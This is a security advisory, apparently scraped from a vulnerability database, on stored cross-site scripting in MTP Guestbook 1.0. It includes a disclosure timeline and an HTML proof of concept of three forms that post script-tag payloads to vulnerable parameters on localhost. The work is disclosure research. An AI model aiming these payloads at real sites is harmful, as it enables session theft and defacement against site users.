Lucene search

K
zeroscienceGjoko KrsticZSL-2013-5131
HistoryFeb 25, 2013 - 12:00 a.m.

MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities

2013-02-2500:00:00
Gjoko Krstic
zeroscience.mk
15

6.3 Medium

AI Score

Confidence

High

Title: MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities
Advisory ID: ZSL-2013-5131
Type: Local/Remote
Impact: Cross-Site Scripting
Risk: (3/5)
Release Date: 25.02.2013

Summary

MTP Guestbook allows you to put a guestbook on your website. Your visitors can sign it and leave a message. The entries can be edited and deleted in the admin area.

Description

MTP Guestbook script suffers from multiple stored cross-site scripting vulnerabilities. The issues are triggered when input passed via several parameters to several scripts is not properly sanitized before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user’s browser session in context of an affected site.

Vendor

MTP Scripts - <http://www.morephp.net>

Affected Version

1.0

Tested On

Linux, Apache2

Vendor Status

[17.02.2013] Vulnerability discovered.
[19.02.2013] Contact with the vendor.
[24.02.2013] No response from the vendor.
[25.02.2013] Public security advisory released.

PoC

mtpguestbook_xss.html

Credits

Vulnerability discovered by Gjoko Krstic - <[email protected]>

References

[1] <http://packetstormsecurity.com/files/120532&gt;
[2] <http://www.securityfocus.com/bid/58149&gt;
[3] <http://cxsecurity.com/issue/WLB-2013020192&gt;
[4] <http://www.exploit-db.com/exploits/24545/&gt;
[5] <http://xforce.iss.net/xforce/xfdb/82383&gt;
[6] <http://www.osvdb.org/show/osvdb/90638&gt;
[7] <http://www.osvdb.org/show/osvdb/90639&gt;
[8] <http://www.osvdb.org/show/osvdb/90642&gt;

Changelog

[25.02.2013] - Initial release
[26.02.2013] - Added reference [1], [2], [3] and [4]
[27.02.2013] - Added reference [5]
[28.02.2013] - Added reference [6], [7] and [8]

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: [email protected]

<!--

MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities


Vendor: MTP Scripts
Product web page: http://www.morephp.net
Affected version: 1.0

Summary: MTP Guestbook allows you to put a guestbook on your website.
Your visitors can sign it and leave a message. The entries can be edited
and deleted in the admin area.

Desc: MTP Guestbook script suffers from multiple stored cross-site scripting
vulnerabilities. The issues are triggered when input passed via several
parameters to several scripts is not properly sanitized before being returned
to the user. This can be exploited to execute arbitrary HTML and script code
in a user's browser session in context of an affected site.

Tested on: Linux, Apache2


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2013-5131
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5131.php


17.02.2013

--><html>
<head>
<title>MTP Guestbook 1.0 Multiple Remote Script Insertion Vulnerabilities</title>
</head>
<body><center>
<form action="http://localhost/mtp_guestbook/blocked.php" method="POST">
<input name="simbol" type="hidden" value='"&gt;&lt;script&gt;alert(1);&lt;/script&gt;'/>
<input name="action" type="hidden" value="add"/>
<input type="submit" value="XSS #1"/>
</form>
<br/><br/>
<form action="http://localhost/mtp_guestbook/insert_user.php" method="POST">
<input name="ins_city" type="hidden" value='"&gt;&lt;script&gt;alert(2);&lt;/script&gt;'/>
<input name="ins_country" type="hidden" value="MK"/>
<input name="ins_email" type="hidden" value="[email protected]"/>
<input name="ins_fname" type="hidden" value='"&gt;&lt;script&gt;alert(3);&lt;/script&gt;'/>
<input name="ins_pass" type="hidden" value="thricerpass"/>
<input name="ins_username" type="hidden" value="thricer"/>
<input type="submit" value="XSS #2"/>
</form>
<br/><br/>
<form action="http://localhost/mtp_guestbook/ajax_cat_ins.php" method="POST">
<input name="name" type="hidden" value='"&gt;&lt;script&gt;alert(4);&lt;/script&gt;'/>
<input type="submit" value="XSS #3"/>
</form>
</center></body>
</html>

6.3 Medium

AI Score

Confidence

High